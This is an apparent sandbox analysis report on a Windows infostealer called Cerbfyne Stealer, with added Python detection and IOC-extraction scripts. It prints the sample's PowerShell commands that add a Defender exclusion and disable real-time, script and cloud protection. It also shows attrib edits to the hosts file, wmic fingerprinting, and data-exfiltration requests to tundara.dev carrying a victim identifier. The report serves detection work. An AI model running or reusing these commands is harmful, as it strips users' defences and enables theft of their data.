
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1563338
MD5: 9096f57fa44b8f20eebf2008a9598eec
SHA1: 42128a72a214368618f5693df45b901232f80496
SHA256: f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934
Tags: exe, user-Bitsight

Detection

Cerbfyne Stealer
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Cerbfyne Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies the hosts file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9096F57FA44B8F20EEBF2008A9598EEC)
    • powershell.exe (PID: 2408 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7272 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7824 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7876 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7968 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8064 cmdline: wmic cpu get Name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 8132 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5660 cmdline: wmic csproduct get UUID MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
No configs have been found
Yara matches (all for rule JoeSecurity_CerbfyneStealer, description "Yara detected Cerbfyne Stealer", author Joe Security):
  • Sample: file.exe
  • Memory dump: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp
  • Memory dump: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp
  • Process Memory Space: file.exe PID: 1408
  • Unpacked PE: 0.0.file.exe.7ff608fb0000.0.unpack
  • Unpacked PE: 0.2.file.exe.7ff608fb0000.0.unpack

              System Summary

Sigma matches on process creation (event fields from the sandbox's process log; the same powershell.exe start is reported by more than one rule):
  • Author: Florian Roth (Nextron Systems). Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2408), parent: "C:\Users\user\Desktop\file.exe" (file.exe, PID 1408). CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe. CommandLine|base64offset|contains: ^
  • Author: Florian Roth (Nextron Systems). Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 7272), parent: "C:\Users\user\Desktop\file.exe" (file.exe, PID 1408). CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend. CommandLine|base64offset|contains: ^
  • Author: Florian Roth (Nextron Systems). Second match on the same event as the first entry: powershell.exe PID 2408, parent file.exe PID 1408, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
  • Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Match on the same event: powershell.exe PID 2408, parent file.exe PID 1408, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe
              No Suricata rule has matched
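The Sigma matches above fire on single process-creation events. The Python below is an added example written for this page (it is not Joe Sandbox code and not the matched Sigma rules): it reproduces those single-event checks for Add-MpPreference exclusions, Set-MpPreference disable switches and attrib changes to the hosts file, and adds the cross-process correlation an analyst wants when reading the tree above: a wmic hardware-fingerprinting burst from one parent, and an exclusion paired with protection disables from the same parent. The events are constructed from the command lines in the process tree; the parent PID of file.exe is not in the report and is set to 0, and the Sysmon Event ID 1 style field names are an assumption.

```python
"""Detection logic for the process tree above: Defender tampering through
Add-MpPreference / Set-MpPreference, attrib changes to the hosts file, and the
wmic hardware-fingerprinting burst. Added example for this page, not Joe
Sandbox code and not the Sigma rules the report matched. The events below are
constructed from the command lines in the report; field names follow Sysmon
Event ID 1 (Image, CommandLine, ParentProcessId)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Set-MpPreference switches that weaken Defender when followed by $true.
DEFENDER_DISABLE_SWITCHES = {
    "-disablerealtimemonitoring", "-disableioavprotection",
    "-disablescriptscanning", "-disableintrusionpreventionsystem",
    "-disablebehaviormonitoring", "-disableblockatfirstseen",
}
HOSTS_FILE = r"c:\windows\system32\drivers\etc\hosts"
# WMI aliases/classes commonly queried to fingerprint the host or detect a VM.
WMIC_FINGERPRINT = re.compile(r"\b(os|cpu|csproduct|bios|diskdrive|win32_videocontroller)\b")


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent_pid: int
    image: str
    command_line: str


def detect_event(ev: ProcessEvent) -> list[str]:
    """Single-event rules, in the spirit of the Sigma matches above."""
    hits = []
    image = ev.image.lower()
    cmd = ev.command_line.lower()
    tokens = cmd.split()
    if image.endswith("powershell.exe") and "add-mppreference" in cmd:
        if re.search(r"-exclusion(path|process|extension)\s+\S+", cmd):
            hits.append("defender_exclusion_added")
    if image.endswith("powershell.exe") and "set-mppreference" in cmd:
        if any(t in DEFENDER_DISABLE_SWITCHES and tokens[i + 1] == "$true"
               for i, t in enumerate(tokens[:-1])):
            hits.append("defender_protection_disabled")
        if "-mapsreporting disabled" in cmd or "-submitsamplesconsent neversend" in cmd:
            hits.append("defender_cloud_reporting_disabled")
    if image.endswith("attrib.exe") and HOSTS_FILE in cmd:
        hits.append("hosts_file_attribute_change")
    return hits


def detect_tree(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Group hits by parent PID and add rules that only make sense across
    several children: a fingerprinting burst, and exclusion + disable together."""
    hits = defaultdict(list)
    children = defaultdict(list)
    for ev in events:
        children[ev.parent_pid].append(ev)
        hits[ev.parent_pid].extend(detect_event(ev))
    for ppid, kids in children.items():
        classes = set()
        for ev in kids:
            if ev.image.lower().endswith("wmic.exe"):
                m = WMIC_FINGERPRINT.search(ev.command_line.lower())
                if m:
                    classes.add(m.group(1))
        if len(classes) >= 3:
            hits[ppid].append("wmi_hardware_fingerprinting")
        if {"defender_exclusion_added", "defender_protection_disabled"} <= set(hits[ppid]):
            hits[ppid].append("defender_tampering_chain")
    return {ppid: sorted(set(r)) for ppid, r in hits.items() if r}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
ATTRIB = r"C:\Windows\System32\attrib.exe"
# Constructed from the report's process tree; the parent of file.exe is not in
# the report, so 0 is used as a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(1408, 0, r"C:\Users\user\Desktop\file.exe", r'"C:\Users\user\Desktop\file.exe"'),
    ProcessEvent(2408, 1408, PS, r"powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe"),
    ProcessEvent(7272, 1408, PS, "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
                 "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true "
                 "-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force "
                 "-MAPSReporting Disabled -SubmitSamplesConsent NeverSend"),
    ProcessEvent(7824, 1408, ATTRIB, r"attrib -r C:\Windows\System32\drivers\etc\hosts"),
    ProcessEvent(7876, 1408, ATTRIB, r"attrib +r C:\Windows\System32\drivers\etc\hosts"),
    ProcessEvent(7968, 1408, WMIC, "wmic os get Caption"),
    ProcessEvent(8064, 1408, WMIC, "wmic cpu get Name"),
    ProcessEvent(8132, 1408, WMIC, "wmic path win32_VideoController get name"),
    ProcessEvent(5660, 1408, WMIC, "wmic csproduct get UUID"),
    # Constructed benign control: an admin only reading the current preferences.
    ProcessEvent(9001, 9000, PS, "powershell Get-MpPreference"),
]

if __name__ == "__main__":
    for ppid, rules in detect_tree(SAMPLE_EVENTS).items():
        print(f"parent PID {ppid}: {', '.join(rules)}")
```

Run as a script it prints the rule names per parent PID; only PID 1408 fires, and it fires every rule. On real data, feed Sysmon Event ID 1 records (or Security 4688 with command-line auditing enabled) into ProcessEvent. The correlation step matters because an exclusion on its own is routine admin work; an exclusion plus four disable switches plus a hardware-fingerprinting burst from one unsigned parent is not.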


              AV Detection

Source: file.exe | ReversingLabs: Detection: 23%
Source: Submitted sample | Integrated Neural Analysis Model: matched with 100.0% probability
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Joe Sandbox View | IP address: 208.95.112.1
Source: Joe Sandbox View | IP address: 51.210.106.44
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (logged four times)
Source: global traffic | HTTP traffic detected: GET /ws?id=ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1 Host: w.tundara.dev User-Agent: Go-http-client/1.1 Connection: Upgrade Sec-WebSocket-Key: +ck7nJwhsfDtHrCBl6ZoOw== Sec-WebSocket-Version: 13 Upgrade: websocket
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip (logged twice)
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: b.tundara.dev
Source: global traffic | DNS traffic detected: DNS query: w.tundara.dev
Source: unknown | HTTP traffic detected: POST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ= HTTP/1.1 Host: b.tundara.dev User-Agent: Go-http-client/1.1 Content-Length: 573 Content-Type: multipart/form-data; boundary=55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002 Accept-Encoding: gzip
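The two tundara.dev requests above carry the same base64 token, once as the ?id= query of the websocket upgrade to w.tundara.dev and once as the last path segment of the multipart POST to b.tundara.dev. Decoded it reads ec:f4:bb:82:f7:e0 followed by 19882742-CC56-1A59-9779-FB8CBFA1E29D, the shape of a MAC address concatenated with a UUID; together with the wmic csproduct get UUID query in the process tree this looks like a per-victim identifier built from hardware identity, but the report itself does not state the format, so treat that reading as an inference. The Go module path C:/Users/Tundara/go/pkg/mod/fyne.io/fyne/v2@v2.5.2/... in the strings section shares its name with the C2 domain, which is a useful pivot. The Python below is an added example for this page (not Joe Sandbox code) that parses the request lines, recovers the token from either position, validates the decoded shape and lists the hosts that received it; ip-api.com (the IP-check behaviour in the signature list) carries no token and is deliberately not reported as a C2 host. The request lines are copied from the report with the header separators restored; the parser also accepts the sandbox's run-together rendering.

```python
"""Network IOC extraction from the HTTP requests above: the C2 hosts and the
victim identifier carried in the URL. Added example for this page, not Joe
Sandbox code. Request lines are copied from the report; the reading of the
decoded id as <MAC address><UUID> is an inference from its shape and from the
sample's "wmic csproduct get UUID" query, not something the report states."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Optional

# Request line plus Host header. The sandbox renders headers run together
# ("HTTP/1.1Host: w.tundara.devUser-Agent: ..."), so the host is cut at the
# first character that cannot be part of a lowercase hostname.
REQUEST_LINE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]\s*Host:\s*([a-z0-9.-]+)")
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$")
UUID_RE = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$", re.I)


@dataclass
class C2Request:
    method: str
    host: str
    path: str
    victim_id: Optional[str]   # raw base64 token from the URL, if any
    mac: Optional[str]
    uuid: Optional[str]


def decode_victim_id(token: str):
    """Base64-decode the id and split it into a 17-char MAC and a 36-char UUID.
    Returns (None, None) when the token is not base64 or has another shape."""
    try:
        raw = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None, None
    mac, uuid = raw[:17], raw[17:]
    if MAC_RE.match(mac) and UUID_RE.match(uuid):
        return mac, uuid
    return None, None


def parse_request(line: str) -> Optional[C2Request]:
    """Parse one logged request; the id travels either as ?id=<b64> (websocket)
    or as the last path segment (multipart POST)."""
    m = REQUEST_LINE.match(line)
    if not m:
        return None
    method, path, host = m.groups()
    token = None
    q = re.search(r"[?&]id=([A-Za-z0-9+/=]+)", path)
    if q:
        token = q.group(1)
    else:
        last = path.split("?")[0].rstrip("/").rsplit("/", 1)[-1]
        if len(last) >= 16 and len(last) % 4 == 0 and B64_TOKEN.match(last):
            token = last
    mac, uuid = decode_victim_id(token) if token else (None, None)
    return C2Request(method, host, path, token, mac, uuid)


def extract_iocs(lines):
    """Hosts that received a decodable victim id, i.e. the C2 endpoints. The
    geo-IP lookup to ip-api.com carries no id and is left out on purpose."""
    hosts = {r.host for r in map(parse_request, lines) if r and r.mac}
    return sorted(hosts)


# Copied from the report (header separators restored for readability).
VICTIM_ID = "ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi1DQzU2LTFBNTktOTc3OS1GQjhDQkZBMUUyOUQ="
REPORT_REQUEST_LINES = [
    f"GET /ws?id={VICTIM_ID} HTTP/1.1 Host: w.tundara.dev User-Agent: Go-http-client/1.1 "
    "Connection: Upgrade Sec-WebSocket-Key: +ck7nJwhsfDtHrCBl6ZoOw== Sec-WebSocket-Version: 13 Upgrade: websocket",
    "GET /json/ HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip",
    f"POST /tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/{VICTIM_ID} HTTP/1.1 Host: b.tundara.dev "
    "User-Agent: Go-http-client/1.1 Content-Length: 573 Content-Type: multipart/form-data; "
    "boundary=55886a13b9171df724d2ad867f316f6cc583361f023996dbc4ae71c10002 Accept-Encoding: gzip",
]

if __name__ == "__main__":
    for req in map(parse_request, REPORT_REQUEST_LINES):
        print(req.method, req.host, req.path.split("/")[1], req.mac, req.uuid)
    print("C2 hosts:", extract_iocs(REPORT_REQUEST_LINES))
```

The decoded MAC and UUID are worth keeping alongside the hosts: if the same token shows up in another capture it ties the two infections to one victim machine, and a hunt for the 17+36 character base64 shape in proxy logs catches the same family even after the operator rotates domains.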
Source: file.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: file.exe | String found in binary or memory: http://dejavu.sourceforge.net
Source: file.exe | String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: file.exe | String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: file.exe | String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: file.exe | String found in binary or memory: http://emojione.com/licensingColor
Source: file.exe | String found in binary or memory: http://emojione.comEmojiOne
Source: file.exe | String found in binary or memory: http://ip-api.com/json/DestroyEnvironmentBlock
Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: file.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: file.exe | String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: file.exe | String found in binary or memory: http://s.symcd.com0_
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: file.exe | String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: file.exe | String found in binary or memory: http://sw.symcd.com0
Source: file.exe | String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: file.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: file.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: file.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B0C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: file.exe, 00000000.00000002.1482903932.000000C000415000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/ZWM6ZjQ6YmI6ODI6Zjc6ZTAxOTg4Mjc0Mi
Source: file.exe | String found in binary or memory: https://b.tundara.dev/tapped/f9b7f1b3-b6a0-4bc1-825a-b4180e3cdc4f/reflect:
Source: file.exe, 00000000.00000002.1486338572.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1486338572.000000C000E7A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://bugzilla.mo
Source: file.exe | String found in binary or memory: https://cdn.discordapp.com/avatars/C:
Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: file.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: file.exe | String found in binary or memory: https://d.symcb.com/rpa0)
Source: file.exe | String found in binary or memory: https://discord.com/api/v8/guilds/expected
Source: file.exe | String found in binary or memory: https://discord.com/api/v9/users/
Source: file.exe | String found in binary or memory: https://discord.gg/tls:
Source: powershell.exe, 00000006.00000002.1289484446.0000021B8B2E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe, 00000000.00000002.1486338572.000000C000C74000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 00000006.00000002.1303055043.0000021B9B134000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1489672991.000000C0012FF000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.de/
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.fr/
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
Source: file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ctrip.com/
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C000395000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.co.uk/
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1479046546.000000C00010A000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1486338572.000000C000957000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1486338572.000000C000C74000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
Source: file.exe, 00000000.00000002.1482903932.000000C000519000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: file.exe, 00000000.00000003.1461142106.000000C0017F3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: file.exe, 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: DirectInput8Creatememstr_f16d2568-f
Source: C:\Users\user\Desktop\file.exe | Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dll
Source: file.exe | Binary or memory string: dunsupported CFF versionunsupported charset: %qinvalid escape sequenceunknown empty width argRemoveFontMemResourceExSHGetSpecialFolderPathWRegisterRawInputDevicesGetEnvironmentVariableAGetLogicalDriveStringsAQueryPerformanceCounterSetConsoleTextAttributeTryEnt

              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: file.exe | Static PE information: Number of sections : 11 > 10
Source: classification engine | Classification label: mal92.troj.adwa.spyw.evad.winEXE@25/13@4/2
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\fyne
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2868:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user~1\AppData\Local\Temp\logs-temp
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
